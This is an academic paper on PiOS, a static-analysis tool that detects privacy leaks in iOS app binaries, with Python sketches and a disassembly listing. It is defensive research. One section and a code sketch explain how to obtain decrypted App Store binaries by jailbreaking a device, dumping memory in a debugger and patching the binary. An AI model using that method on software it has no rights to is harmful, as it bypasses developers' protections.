PiOS: Detecting Privacy Leaks in iOS Applications

Manuel Egele, Christopher Kruegel, Engin Kirda, and Giovanni Vigna

Vienna University of Technology, Austria
[email protected]

University of California, Santa Barbara
{maeg,chris,vigna}@cs.ucsb.edu

Institute Eurecom, Sophia Antipolis
[email protected]

Northeastern University, Boston
[email protected]

Abstract
With the introduction of Apple's iOS and Google's Android operating systems, the sales of smartphones have exploded. These smartphones have become powerful devices that are basically miniature versions of personal computers. However, the growing popularity and sophistication of smartphones have also increased concerns about the privacy of users who operate these devices. These concerns have been exacerbated by the fact that it has become increasingly easy for users to install and execute third-party applications. To protect its users from malicious applications, Apple has introduced a vetting process. This vetting process should ensure that all applications conform to Apple's (privacy) rules before they can be offered via the App Store. Unfortunately, this vetting process is not well-documented, and there have been cases where malicious applications had to be removed from the App Store after user complaints.

In this paper, we study the privacy threats that applications, written for Apple's iOS, pose to users. To this end, we present a novel approach and a tool, PiOS, that allow us to analyze programs for possible leaks of sensitive information from a mobile device to third parties. PiOS uses static analysis to detect data flows in Mach-O binaries, compiled from Objective-C code. This is a challenging task due to the way in which Objective-C method calls are implemented. We have analyzed more than 1,400 iPhone applications. Our experiments show that, with the exception of a few bad apples, most applications respect personally identifiable information stored on users' devices. This is even true for applications that are hosted on an unofficial repository (Cydia) and that only run on jailbroken phones. However, we found that more than half of the applications surreptitiously leak the unique ID of the device they are running on. This allows third parties to create detailed profiles of users' application preferences and usage patterns.
1 Introduction
Mobile phones have rapidly evolved over the last few years. The latest generations of smartphones are basically miniature versions of personal computers; they offer not only the possibility to make phone calls and to send messages, but they are a communication and entertainment platform for users to surf the web, send emails, and play games. Mobile phones are also ubiquitous, and allow anywhere, anytime access to information. In the second quarter of 2010 alone, more than 300 million devices were sold worldwide [13].

Given the wide range of applications for mobile phones and their popularity, it is not surprising that these devices store an increasing amount of sensitive information about their users. For example, the address book contains information about the people that a user interacts with. The GPS receiver reveals the exact location of the device. Photos, emails, and the browsing history can all contain private information.
Since the introduction of Apple's iOS¹ and the Android operating systems, smartphone sales have significantly increased. Moreover, the introduction of marketplaces for apps (such as Apple's App Store) has provided a strong economic driving force, and tens of thousands of applications have been developed for iOS and Android. Of course, the ability to run third-party code on a mobile device is a potential security risk. Thus, mechanisms are required to properly protect sensitive data against malicious applications. Android has a well-defined mediation process that makes the data needs and information accesses transparent to users. With Apple iOS, the situation is different. In principle, there are no technical mechanisms that limit the access that an application has. Instead, users are protected by Apple's developer license agreement [3]. This document defines the acceptable terms for access to sensitive data. An important rule is that an application is prohibited from transmitting any data unless the user expresses her explicit consent. Moreover, an application can ask for permission only when the data is directly required to implement a certain functionality of the application. To enforce the restrictions set out in the license agreement, Apple has introduced a vetting process.

¹ Apple iOS, formerly known as iPhone OS, is the operating system that runs on Apple's iPhone, iPod Touch, and iPad products.
During the vetting process, Apple scrutinizes all applications submitted by third-party developers. If an application is determined to be in compliance with the licensing agreement, it is accepted, digitally signed, and made available through the iTunes App Store. It is important to observe that accessing the App Store is the only way for users with unmodified iOS devices to install applications. This ensures that only Apple-approved programs can run on iPhones (and other Apple products). To be able to install and execute other applications, it is necessary to jailbreak the device and disable the check that ensures that only properly signed programs can run.

Unfortunately, the exact details of the vetting process are not known publicly. This makes it difficult to fully trust third-party applications, and it raises doubts about the proper protection of users' data. Moreover, there are known instances (e.g., [20]) in which a malicious application has passed the vetting process, only to be removed from the App Store later when Apple became aware of its offending behavior. For example, in 2009, when Apple realized that the applications created by Storm8 harvested users' phone numbers and other personal information, all applications from this developer were removed from the App Store.
The goal of the work described in this paper is to automatically analyze iOS applications and to study the threat they pose to user data. As a side effect, this also shines some light on the (almost mysterious) vetting process, as we obtain a better understanding of the kinds of information that iOS applications access without asking the user. To analyze iOS applications, we developed PiOS, an automated tool that can identify possible privacy breaches.

PiOS uses static analysis to check applications for the presence of code paths where an application first accesses sensitive information and subsequently transmits this information over the network. Since no source code is available, PiOS has to perform its analysis directly on the binaries. While static, binary analysis is already challenging, the work is further complicated by the fact that most iOS applications are developed in Objective-C.

Objective-C is a superset of the C programming language that extends it with object-oriented features. Typical applications make heavy use of objects, and most function calls are actually object method invocations. Moreover, these method invocations are all funneled through a single dispatch (send message) routine. This makes it difficult to obtain a meaningful program control flow graph (CFG) for a program. However, a CFG is the starting point required for most other interesting program analyses. Thus, we had to develop novel techniques to reconstruct meaningful CFGs for iOS applications. Based on the control flow graphs, we could then perform data flow analysis to identify flows where sensitive data might be leaked without asking for user permission.
Using PiOS, we analyzed 825 free applications available on the iTunes App Store. Moreover, we also examined 582 applications offered through the Cydia repository. The Cydia repository is similar to the App Store in that it offers a collection of iOS applications. However, it is not associated with Apple, and hence, can only be used by jailbroken devices. By checking applications both from the official Apple App Store and Cydia, we can examine whether the risk of privacy leaks increases if unvetted applications are installed.

The contributions of this paper are as follows:

- We present a novel approach that is able to automatically create comprehensive CFGs from binaries compiled from Objective-C code. We can then perform reachability analysis on these CFGs to identify possible leaks of sensitive information from a mobile device to third parties.

- We describe the prototype implementation of our approach, PiOS, that is able to analyze large bodies of iPhone applications, and automatically determines if these applications leak out any private information.

- To show the feasibility of our approach, we have analyzed more than 1,400 iPhone applications. Our results demonstrate that a majority of applications leak the device ID. However, with a few notable exceptions, applications do respect personally identifiable information. This is even true for applications that are not vetted by Apple.
2 System Overview
The goal of PiOS is to detect privacy leaks in applications written for iOS. This makes it necessary to first concretize our notion of a privacy leak. We define as a privacy leak any event in which an iOS application reads sensitive data from the device and sends this data to a third party without the user's consent. To request the user's consent, the application displays a message (via the device's UI) that specifies the data item that should be accessed. Moreover, the user is given the choice of either granting or denying the access. When an application does not ask for user permission, it is in direct violation of the iPhone developer program license agreement [3], which mandates that no sensitive data may be transmitted unless the user has expressed her explicit consent.

The license agreement also states that an application may ask for access permissions only when the proper functionality of the application depends on the availability of the data. Unfortunately, this requirement makes it necessary to understand the semantics of the application and its intended use. Thus, in this paper, we do not consider privacy violations where the user is explicitly asked to grant access to data, but this data is not essential to the program's functionality.
As a next step, we have to decide the types of information that constitute sensitive user data. Turning to the Apple license agreement is of little help. Unfortunately, the text neither precisely defines user data nor enumerates functions that should be considered sensitive. Since the focus of this work is to detect leaks in general, we take a loose approach and consider a wide variety of data that can be accessed through the iOS API as being potentially sensitive. In particular, we used the open-source iOS application Spyphone [17] as inspiration. The purpose of Spyphone is to demonstrate that a significant number of interesting data elements (user and device information) are accessible to programs. Since this is exactly the type of information that we are interested in tracking, we consider these data elements as sensitive. A more detailed overview of sensitive data elements is presented in Section 5.
Data flow analysis. The problem of finding privacy leaks in applications can be framed as a data flow problem. That is, we can find privacy leaks by identifying data flows from input functions that access sensitive data (called sources) to functions that transmit this data to third parties (called sinks). We also need to check that the user is not asked for permission. Of course, it would be relatively easy to find the location of functions that interact with the user, for example, by displaying a message box. However, it is more challenging to automatically determine whether this interaction actually has the intent of warning the user about the access to sensitive data. In our approach, we use the following heuristic: Whenever there is any user interaction between the point where sensitive information is accessed and the point where this information could be transferred to a third party, we optimistically assume that the purpose of this interaction is to properly warn the user.
As shown in Figure 1, PiOS performs three steps when checking an iOS application for privacy leaks. First, PiOS reconstructs the control flow graph (CFG) of the application. The CFG is the underlying data structure (graph) that is used to find code paths from sensitive sources to sinks. Normally, a CFG is relatively straightforward to extract, even when only the binary code is available. Unfortunately, the situation is different for iOS applications. This is because almost all iOS programs are developed in Objective-C.

Objective-C programs typically make heavy use of objects. As a result, most function calls are actually invocations of instance methods. To make matters worse, these method invocations are all performed through an indirect call of a single dispatch function. Hence, we require novel binary analysis techniques to resolve method invocations, and to determine which piece of code is eventually invoked by the dispatch routine. For this analysis, we first attempt to reconstruct the class hierarchy and inheritance relationships between Objective-C classes. Then, we use backward slicing to identify both the arguments and types of the input parameters to the dispatch routine. This allows us to resolve the actual target of function calls with good accuracy. Based on this information, the control flow graph can be built.

In the second step, PiOS checks the CFG for the presence of paths that connect nodes accessing sensitive information (sources) to nodes interacting with the network (sinks). For this, the system performs a standard reachability analysis.

In the third and final step, PiOS performs data flow analysis along the paths to verify whether sensitive information is indeed flowing from the source to the sink. This requires some special handling for library functions that are not present in the binary, especially those with a variable number of arguments. After the data flow analysis has finished, PiOS reports the source/sink pairs for which it could confirm a data flow. These cases constitute privacy leaks. Moreover, the system also outputs the remaining paths for which no data flow was found. This information is useful to be able to focus manual analysis on a few code paths for which the static analysis might have missed an actual data flow.
3 Background Information
The goal of this section is to provide the reader with the relevant background information about iOS applications, their Mach-O binary format, and the problems that compiled Objective-C code causes for static binary analysis. The details of the PiOS system are then presented in later sections.
3.1 Objective-C
Objective-C is a strict superset of the C programming language that adds object-oriented features to the basic language. Originally developed at NextStep, Apple and its line of operating systems are now the driving force behind the development of the Objective-C language.

[Figure 1. The PiOS system. Step 1: Reconstruct CFG; Step 2: Reachability Analysis; Step 3: Data-Flow Analysis.]
The foundation for the object-oriented aspects in the language is the notion of a class. Objective-C supports single inheritance, where every class has a single superclass. The class hierarchy is rooted at the NSObject class. This is the most basic class. Similar to other object-oriented languages, (static) class variables are shared between all instances of the same class. Instance variables, on the other hand, are specific to a single instance. The same holds for class and instance methods.
Protocols and categories. In addition to the features commonly found in object-oriented languages, Objective-C also defines protocols and categories. Protocols resemble interfaces, and they define sets of optional or mandatory methods. A class is said to adopt a protocol if it implements at least all mandatory methods of the protocol. Protocols themselves do not provide implementations.

Categories resemble aspects, and they are used to extend the capabilities of existing classes by providing the implementations of additional methods. That is, a category allows a developer to extend an existing class with additional functionality, even without access to the source code of the original class.
Message passing. The major difference between Objective-C binaries and binaries compiled from other programming languages (such as C or C++) is that, in Objective-C, objects do not call methods of other objects directly or through virtual method tables (vtables). Instead, the interaction between objects is accomplished by sending messages. The delivery of these messages is implemented through a dynamic dispatch function in the Objective-C runtime.

To send a message to a receiver object, a pointer to the receiver, the name of the method (the so-called selector; a null-terminated string), and the necessary parameters are passed to the objc_msgSend runtime function. This function is responsible for dynamically resolving and invoking the method that corresponds to the given selector. To this end, the objc_msgSend function traverses the class hierarchy, starting at the receiver object, trying to locate the method that corresponds to the selector. This method can be implemented in either the class itself, or in one of its superclasses. Alternatively, the method can also be part of a category that was previously applied to either the class, or one of its superclasses. If no appropriate method can be found, the runtime returns an "object does not respond to selector" error.

Clearly, finding the proper method to invoke is a non-trivial, dynamic process. This makes it challenging to resolve method calls statically. The process is further complicated by the fact that calls are handled by a dispatch function.
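To illustrate the lookup that the dispatch routine performs at run time, the following Python sketch models a strongly simplified version of this selector resolution. The toy class hierarchy, the dictionary-based object representation, and the example selectors are invented for illustration; the real runtime additionally consults method caches, categories, and metaclasses.

class_hierarchy = {
    # class name: (superclass, {selector: implementation})
    "NSObject": (None, {"description": lambda recv: "<NSObject>"}),
    "NSString": ("NSObject", {"length": lambda recv: len(recv["value"])}),
    "NSMutableString": ("NSString", {"appendString:": lambda recv, s: recv["value"] + s}),
}

def objc_msgSend(receiver, selector, *args):
    cls = receiver["isa"]                       # class of the receiver object
    while cls is not None:
        superclass, methods = class_hierarchy[cls]
        if selector in methods:                 # found in this class
            return methods[selector](receiver, *args)
        cls = superclass                        # otherwise continue in the superclass
    raise RuntimeError("object does not respond to selector: " + selector)

obj = {"isa": "NSMutableString", "value": "Hello"}
print(objc_msgSend(obj, "length"))              # resolved in NSString -> 5
print(objc_msgSend(obj, "appendString:", "!"))  # resolved in NSMutableString -> Hello!

The same hierarchy walk is what PiOS has to approximate statically: instead of executing the lookup, it must infer the receiver's type and the selector at each call site.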
3.2 Mach-O Binary File Format
iOS executables use the Mach-O binary file format, similar to Mac OS X. Since many applications for these platforms are developed in Objective-C, the Mach-O format supports specific sections, organized in so-called commands, to store additional meta-data about Objective-C programs. For example, the __objc_classlist section contains a list of all classes for which there is an implementation in the binary. These are either classes that the developer has implemented or classes that the static linker has included. The __objc_classrefs section, on the other hand, contains references to all classes that are used by the application. The implementations of these classes need not be contained in the binary itself, but may be provided by the runtime framework (the equivalent of dynamically-linked libraries). It is the responsibility of the dynamic linker to resolve the references in this section when loading the corresponding library. Further sections include information about categories, selectors, or protocols used or referenced by the application.

Apple has been developing the Objective-C runtime as an open-source project. Thus, the specific memory layout of the involved data structures can be found in the header files of the Objective-C runtime. By traversing these structures in the binary (according to the header files), one can reconstruct basic information about the implemented classes. In Section 4.1, we show how we can leverage this information to build a class hierarchy of the analyzed application.
Signatures and encryption. In addition to specific sections that store Objective-C meta-data, the Mach-O file format also supports cryptographic signatures and encrypted binaries. Cryptographic signatures are stored in the LC_SIGNATURE_INFO command (part of a section). Upon invoking a signed application, the operating system's loader verifies that the binary has not been modified. This is done by recalculating the signature and matching it against the information stored in the section. If the signatures do not match, the application is terminated.

The LC_ENCRYPTION_INFO command contains three fields that indicate whether a binary is encrypted and store the offset and the size of the encrypted content. When the field cryptid is set, this means that the program is encrypted. In this case, the two remaining fields (cryptoffset and cryptsize) identify the encrypted region within the binary. When a program is encrypted, the loader tries to retrieve the decryption key from the system's secure key chain. If a key is found, the binary is loaded into memory, and the encrypted region is replaced in memory with an unencrypted version thereof. If no key is found, the application cannot be executed.
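To make the layout of this load command concrete, the following Python sketch parses a single LC_ENCRYPTION_INFO command with the struct module. It assumes the 32-bit layout from Apple's open-source loader headers, where the command consists of five 32-bit words (cmd, cmdsize, and the fields there called cryptoff, cryptsize, and cryptid); the example bytes are fabricated.

import struct

LC_ENCRYPTION_INFO = 0x21  # load command value from mach-o/loader.h

def parse_encryption_info(cmd_bytes):
    # 32-bit layout: five 32-bit words (cmd, cmdsize, cryptoff, cryptsize, cryptid).
    cmd, cmdsize, cryptoff, cryptsize, cryptid = struct.unpack("<5I", cmd_bytes[:20])
    assert cmd == LC_ENCRYPTION_INFO
    return {
        "encrypted": cryptid != 0,  # cryptid set => the program is encrypted
        "offset": cryptoff,         # file offset of the encrypted region
        "size": cryptsize,          # size of the encrypted region in bytes
    }

# Fabricated example: an encrypted region of 0x1000 bytes starting at offset 0x2000.
example = struct.pack("<5I", LC_ENCRYPTION_INFO, 20, 0x2000, 0x1000, 1)
print(parse_encryption_info(example))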
3.3 iOS Applications
The mandatory way to install applications on iOS is through Apple's App Store. This store is typically accessed via iTunes. Using iTunes, the requested application bundle is downloaded and stored in a zip archive (with an .ipa file extension). This bundle contains the application itself (the binary), data files, such as images, audio tracks, or databases, and meta-data related to the purchase.

All binaries that are available via the App Store are encrypted and digitally signed by Apple. When an application is synchronized onto the mobile device (iPhone, iPad, or iPod), iTunes extracts the application folder from the archive (bundle) and stores it on the device. Furthermore, the decryption key for the application is added to the device's secure key chain. This is required because the application binaries are also stored in encrypted form.
As PiOS requires access to the unencrypted binary code for its analysis, we need to find a way to obtain the decrypted version of a program. Unfortunately, it is not straightforward to extract the application's decryption key from the device (and the operating system's secure key chain). Furthermore, to use these keys, one would also have to implement the proper decryption routines. Thus, we use an alternative method to obtain the decrypted binary code.
Decrypting iOS applications. Apple designed the iPhone platform with the intent to control all software that is executed on the devices. Thus, the design does not intend to give full system (or root) access to a user. Moreover, only signed binaries can be executed. In particular, the loader will not execute a signed binary without a valid signature from Apple. This ensures that only unmodified, Apple-approved applications are executed on the device.

The first step to obtain a decrypted version of an application binary is to lift the restriction that only Apple-approved software can be executed. To this end, one needs to jailbreak the device². The term jailbreaking refers to a technique where a flaw in the iOS operating system is exploited to unlock the device, thereby obtaining system-level (root) access. With such elevated privileges, it is possible to modify the system loader so that it accepts any signed binary, even if the signature is not from Apple. That is, the loader will accept any binary as being valid even if it is equipped with a self-signed certificate. Note that jailbroken devices still have access to the iTunes App Store and can download and run Apple-approved applications.

² In July 2010, the Library of Congress, which runs the US Copyright Office, found that jailbreaking an iPhone is fair use [8].

One of the benefits of jailbreaking is that the user obtains immediate access to many development tools ready to be installed on iOS, such as a debugger, a disassembler, and even an SSH server. This makes the second step quite straightforward: The application is launched in the debugger, and a breakpoint is set at the program entry point. Once this breakpoint triggers, we know that the system loader has verified the signature and performed the decryption. Thus, one can dump the memory region that contains the now decrypted code from the address space of the binary.
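Once the decrypted region has been dumped from the running process, it still has to be combined with the on-disk binary before a disassembler can work on it. The following Python sketch shows one plausible way to do this; it assumes the region was already dumped to a file (for example, with a debugger on the jailbroken device) and that the offset and size of the encrypted region are known from the LC_ENCRYPTION_INFO command. The file names are placeholders, and this is not necessarily how PiOS itself performs the step.

def patch_decrypted_region(encrypted_path, dump_path, output_path,
                           crypt_offset, crypt_size):
    # Read a copy of the encrypted binary and the dumped plaintext region.
    with open(encrypted_path, "rb") as f:
        binary = bytearray(f.read())
    with open(dump_path, "rb") as f:
        decrypted = f.read()
    assert len(decrypted) == crypt_size, "dump does not match the encrypted region"
    # Overwrite the encrypted region with the plaintext bytes dumped from memory.
    binary[crypt_offset:crypt_offset + crypt_size] = decrypted
    with open(output_path, "wb") as f:
        f.write(binary)

# Hypothetical usage (file names and offsets are placeholders):
# patch_decrypted_region("App.encrypted", "region.dump", "App.decrypted",
#                        crypt_offset=0x2000, crypt_size=0x1000)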
4 Extracting Control Flow Graphs from Objective-C Binaries
Using the decrypted version of an application binary as input, PiOS first needs to extract the program's inter-procedural control flow graph (CFG). Nodes in the CFG are basic blocks. Two nodes connected through an edge indicate a possible flow of control. Basic blocks are sequences of consecutive instructions with linear control flow. Thus, a basic block is terminated by either a conditional branch, a jump, a call, or the end of a function body.
Disassembly and initial CFG. In an initial step, we need to disassemble the binary. For this, we chose IDA Pro, arguably the most popular disassembler. IDA Pro already has built-in support for the Mach-O binary format, and we implemented our analysis components as plug-ins for the IDA-python interface. Note that while IDA Pro supports the Mach-O binary format, it provides only limited additional support to analyze Objective-C binaries: For example, method names are prepended with the name of the class that implements the method. Similarly, if load or store instructions operate on instance variables, the memory references are annotated accordingly. Unfortunately, IDA Pro does not resolve the actual targets of calls to the objc_msgSend dispatch function. It only recognizes the call to the dynamic dispatch function itself. Hence, the resulting CFG is of limited value. The reason is that, to be able to perform a meaningful analysis, it is mandatory to understand which method in which class is invoked whenever a message is sent. That is, PiOS needs to resolve, for every call to the objc_msgSend function, what method in what class would be invoked by the dynamic dispatch function during program execution.

Section 4.2 describes how PiOS is able to resolve the targets of calls to the dispatch function. As this process relies on the class hierarchy of a given application, we first discuss how this class hierarchy can be retrieved from an application's binary.
4.1 Building a Class Hierarchy
To reconstruct the class hierarchy of a program, PiOS parses the sections in the Mach-O file that store basic information about the structure of the classes implemented by the binary. The code of Apple's Objective-C runtime is open source, and thus, the exact layout of the involved structures can be retrieved from the corresponding header files. This makes the parsing of the binaries easy.

To start the analysis, the __objc_classlist section contains a list of all classes whose implementation is present in the analyzed binary (that is, all classes implemented by the developer or included by the static linker). For each of these classes, we can extract its type and the type of its superclass. Moreover, the entry for each class contains structures that provide additional information, such as the list of implemented methods and the list of class and instance variables. Similarly, the Mach-O binary format mandates sections that describe protocols used in the application, and categories with their implementation details.

In principle, the pointers to the superclasses would be sufficient to recreate the class hierarchy. However, it is important for subsequent analysis steps to also have information about the available methods for each class, as well as the instance and class variables. This information is necessary to answer questions such as "does a class C, or any of its superclasses, implement a given method M?"

Obviously, not all classes and types used by an application need to be implemented in the binary itself. That is, additional code could be dynamically linked into an application's address space at runtime. Fortunately, as the iOS SDK contains the header files describing the APIs (e.g., classes, methods, protocols) accessible to iOS applications, PiOS can parse these header files and extend the class hierarchy with the additional required information.
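The following Python sketch shows, in strongly simplified form, how the extracted (class, superclass, methods) information and the information parsed from the SDK headers could be merged into one hierarchy that answers exactly this kind of question. The data structures and the example classes are invented; PiOS performs the equivalent bookkeeping inside its IDA Pro plug-ins.

hierarchy = {}  # class name -> {"super": superclass name, "methods": set of selectors}

def add_class(name, superclass, methods):
    hierarchy[name] = {"super": superclass, "methods": set(methods)}

def implements(cls, selector):
    # Does cls, or any of its superclasses, implement the given selector?
    while cls is not None:
        entry = hierarchy.get(cls)
        if entry is None:
            return False              # unknown class (e.g., its type was not resolved)
        if selector in entry["methods"]:
            return True
        cls = entry["super"]
    return False

# Information parsed from the SDK headers (framework classes):
add_class("NSObject", None, ["init", "description"])
add_class("NSString", "NSObject", ["length", "initWithString:"])
# Information extracted from the binary's __objc_classlist section:
add_class("MyViewController", "NSObject", ["viewDidLoad"])

print(implements("MyViewController", "description"))  # True (inherited from NSObject)
print(implements("NSString", "viewDidLoad"))          # False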
4.2 Resolving Method Calls
As mentioned previously, method calls in Objective-C are performed through the dispatch function objc_msgSend. This function takes a variable number of arguments (it has a vararg prototype). However, the first argument always points to the object that receives the message (that is, the called object), while the second argument holds the selector, a pointer to the name of the method. On the ARM architecture, currently the only architecture supported by iOS, the first two method parameters are passed in the registers R0 and R1, respectively. Additional parameters to the dispatch function, which represent the actual parameters to the method that is invoked, are passed via registers R2, R3, and the stack.

Listing 1 shows a snippet of Objective-C code that initializes a variable of type NSMutableString to the string "Hello". This snippet leads to two method invocations (messages). First, a string object is allocated, using the alloc method of the NSMutableString class. Second, this string object is initialized with the static string "Hello". This is done through the initWithString method.

The disassembly in Listing 2 shows that CPU register R0 is initialized with a pointer to the NSMutableString class. This is done by first loading the (fixed) address off_31A0 (instruction: 0x266A) and then dereferencing it (0x266E). Similarly, a pointer to the selector (alloc, referenced by address off_3154) is loaded into register R1. The addresses of the NSMutableString class and the selector refer to elements in the __objc_classrefs and __objc_selrefs sections, respectively. That is, the dynamic linker will patch in the final addresses at runtime. However, since these addresses are fixed (constant) values, they can be directly resolved during static analysis and associated with the proper classes and methods. Once R0 and R1 are set up, the BLX (branch with link exchange) instruction calls the objc_msgSend function in the Objective-C runtime. The result of the alloc method (which is the address of the newly-created string instance) is saved in register R0.

In the next step, the initWithString method is called. This time, the target is not a static class method, but an instance method. Thus, the address of the receiver of the message is not a static address. Instead, it is the address that the previous alloc call returned, and that is already conveniently stored in the correct register (R0). The only thing that is left to do is to load R1 with the proper selector (initWithString) and R2 with a pointer to the static string "Hello" (cfstr_Hello). Again, the BLX instruction calls the objc_msgSend function.

As the example shows, to analyze an Objective-C application, it is necessary to resolve the contents of the involved registers and memory locations when the dispatch function is invoked. To this end, PiOS employs backward slicing to calculate the contents of these registers at every call site to the objc_msgSend function in an application binary. If PiOS is able to determine the type of the receiver (R0) and the value of the selector (R1), it annotates the call site with the specific class and method that will be invoked when the program is executed.
4.2.1 Backward Slicing
To determine the contents of registers R0 and R1 at a call site to the objc_msgSend function, PiOS performs backward slicing [19], starting from those registers. That is, PiOS traverses the binary backwards, recording all instructions that influence or define the values in the target registers. Operands that are referenced in such instructions are resolved recursively. The slicing algorithm terminates if it reaches the start of the function or if all values can be determined statically (i.e., they are statically defined). A value is statically defined if it is a constant operand of an instruction or a static memory location (address).

In Listing 2, for example, the slice for the call to objc_msgSend at address 0x2672 (the alloc call) stops at 0x2668. At this point, the values for both R0 and R1 are statically defined (as the two offsets off_3154 and off_31A0). The slice for the call site at 0x267c (the string initialization) contains the instructions up to 0x2672. The slicing algorithm terminates there because function calls and message send operations store their return values in R0. Thus, R0 is defined to be the result of the message send operation at 0x2672.

Once the slice of instructions influencing the values of R0 and R1 is determined, PiOS performs forward constant propagation. That is, constant values are propagated along the slice according to the semantics of the instructions. For example, MOV operations copy a value from one register to another,³ and LDR and STR instructions access memory locations.
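The following Python sketch illustrates this slicing step on a toy encoding of the instructions from Listing 2. Each instruction is represented as a tuple of (address, register it defines, operands it uses); this representation, and the decision to simply let the message send define R0, are simplifications chosen for illustration and do not reflect how PiOS represents ARM instructions inside IDA Pro.

instructions = [
    (0x2668, "R1", ["off_3154"]),     # LDR R1, =off_3154
    (0x266A, "R0", ["off_31A0"]),     # LDR R0, =off_31A0
    (0x266C, "R4", ["R1"]),           # LDR R4, [R1]
    (0x266E, "R0", ["R0"]),           # LDR R0, [R0]
    (0x2670, "R1", ["R4"]),           # MOV R1, R4
    (0x2672, "R0", []),               # BLX _objc_msgSend (alloc; its result defines R0)
    (0x2676, "R1", ["off_3190"]),     # LDR R1, =off_3190
    (0x2678, "R2", ["cfstr_Hello"]),  # LDR R2, =cfstr_Hello
    (0x267A, "R1", ["R1"]),           # LDR R1, [R1]
]

def backward_slice(call_site, targets):
    # Walk backwards from the call site and collect the instructions that
    # (transitively) define the target registers.
    wanted, slice_ = set(targets), []
    for addr, defined, used in reversed([i for i in instructions if i[0] < call_site]):
        if defined in wanted:
            slice_.append((addr, defined, used))
            wanted.discard(defined)
            # Register operands are resolved recursively; static addresses are not.
            wanted.update(u for u in used if u.startswith("R"))
        if not wanted:
            break
    return list(reversed(slice_))

for call_site in (0x2672, 0x267C):
    slice_addrs = [hex(addr) for addr, _, _ in backward_slice(call_site, ["R0", "R1"])]
    print(hex(call_site), "<-", slice_addrs)

Running the sketch for the call site at 0x267C yields the instructions at 0x2672, 0x2676, and 0x267A, matching the slice described above; for 0x2672, it collects all instructions back to 0x2668.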
4.2.2 Tracking Type Information
PiOS does not track (the addresses of) individual instances of classes allocated during runtime. Thus, the question in the previous example is how to handle the return value of the alloc function, which returns a dynamic (and hence, unknown) pointer to a string object. Our key insight is that, for our purposes, the actual address of the string object is not important. Instead, it is only important to know that R0 points to an object of type NSMutableString. Thus, we do not only propagate constants along a slice, but also type information.

In our example, PiOS can determine the return type of the alloc method call at address 0x2672 (the alloc method always returns the same type as its receiver; NSMutableString in this case). This type information is then propagated along the slice. As a result, at address 0x267c, we have at our disposal the crucial information that R0 contains an object of type NSMutableString.

To determine the types of function arguments and return values, our system uses two sources of information. First, for all external methods, the header files specify the precise argument and return types. Unfortunately, there is no such information for the methods implemented in the application binary. More precisely, although the data structure that describes class and instance methods does contain a field that lists the parameter types, the stored information is limited to basic types such as integer, Boolean, or character. All object arguments are defined as a single type id and, hence, cannot be distinguished easily.

Therefore, as a second source of type information, PiOS attempts to resolve the precise types of all arguments marked as id. To this end, the system examines, for each method, all call sites that invoke this method. For the identified call sites, the system tries to resolve the parameter types by performing the above-mentioned backward slicing and constant propagation steps. Once a parameter type is identified, the meta-data for the method can be updated accordingly. That is, we are building up a database as we learn additional type information for method call arguments.

³ GCC seems to frequently implement such register transfers as SUB Rd, Rs, #0 or ADD Rd, Rs, #0.
NSMutableString *v;
v = [[NSMutableString alloc] initWithString: @"Hello"];

Listing 1. Simple Objective-C expression

__text:00002668 30 49          LDR  R1, =off_3154
__text:0000266A 31 48          LDR  R0, =off_31A0
__text:0000266C 0C 68          LDR  R4, [R1]
__text:0000266E 00 68          LDR  R0, [R0]
__text:00002670 21 46          MOV  R1, R4
__text:00002672 00 F0 32 E9    BLX  _objc_msgSend ; NSMutableString alloc
__text:00002676 2F 49          LDR  R1, =off_3190
__text:00002678 2F 4A          LDR  R2, =cfstr_Hello
__text:0000267A 09 68          LDR  R1, [R1]
__text:0000267C 00 F0 2C E9    BLX  _objc_msgSend ; NSMutableString initWithString:

Listing 2. Disassembly of Listing 1
Frequently, messages are sent to objects that are returned as results of previous method calls. As with method input arguments, precise return type information is only available for functions whose prototypes are defined in header files. However, on the ARM architecture, the return value of a method is always returned in register R0. Thus, for methods that have an implementation in the binary and whose return type is not a basic type, PiOS can derive the return type by determining the type of the value stored in R0 at the end of the called method's body. For this, we again use backward slicing and forward constant propagation. Starting with the last instruction of the method whose return type should be determined, PiOS calculates the slice that defines the type of register R0 at this program location.
4.3 Generating the Control Flow Graph
Once PiOS has determined the type of R0 and the content of R1 at a given call site to objc_msgSend, the system checks whether these values are reasonable. To this end, PiOS verifies that the class hierarchy contains a class that matches the type of R0, and that this class, or any of its superclasses or categories, really implements the method whose name is stored as the selector in R1. Of course, statically determining the necessary values is not always possible. However, note that in cases where only the selector can be determined, PiOS can still reason about the type of the value in R0 if there is exactly one class in the application that implements the selector in question.

When PiOS can resolve the target of a function call through the dispatch routine, this information is leveraged to build the control flow graph of the application. More precisely, when the target of a method call (the recipient of the message) is known, and the implementation of this method is present in the binary under analysis (and not in a dynamic library), PiOS adds an edge from the call site to the target method.
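The sketch below summarizes this sanity check and the resulting edge creation in Python. The class hierarchy, the call site, and the set of methods implemented in the binary are toy data, and the fallback for call sites where only the selector is known is simplified to "exactly one implementing class in the hierarchy".

hierarchy = {
    "NSObject":       {"super": None,       "methods": {"init"}},
    "Uploader":       {"super": "NSObject", "methods": {"sendData:"}},
    "ViewController": {"super": "NSObject", "methods": {"viewDidLoad"}},
}
implemented_in_binary = {("Uploader", "sendData:"), ("ViewController", "viewDidLoad")}

def implementing_class(cls, selector):
    # Walk up the hierarchy to find the class that implements the selector.
    while cls is not None:
        if selector in hierarchy[cls]["methods"]:
            return cls
        cls = hierarchy[cls]["super"]
    return None

def resolve_call(receiver_type, selector):
    # Sanity check: the inferred type must exist and (transitively) implement the
    # selector. If that fails (e.g., only the selector is known), fall back to the
    # case where exactly one class in the application implements the selector.
    if receiver_type in hierarchy:
        impl = implementing_class(receiver_type, selector)
        if impl is not None:
            return (impl, selector)
    candidates = [c for c in hierarchy if selector in hierarchy[c]["methods"]]
    return (candidates[0], selector) if len(candidates) == 1 else None

cfg_edges = []
call_site = (0x4F20, "ViewController", "viewDidLoad")  # (address, type of R0, selector)
target = resolve_call(call_site[1], call_site[2])
if target is not None and target in implemented_in_binary:
    cfg_edges.append((call_site[0], target))            # edge: call site -> method body
print(cfg_edges)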
5 Finding Potential Privacy Leaks
The output of the process described in the previous section is an inter-procedural control flow graph of the application under analysis. Based on this graph, we perform reachability analysis to detect privacy leaks. More precisely, we check the graph for the presence of paths from sources (functions that access sensitive data) to sinks (functions that transmit data over the network). In the current implementation of PiOS, we limited the maximum path length to 100 basic blocks.

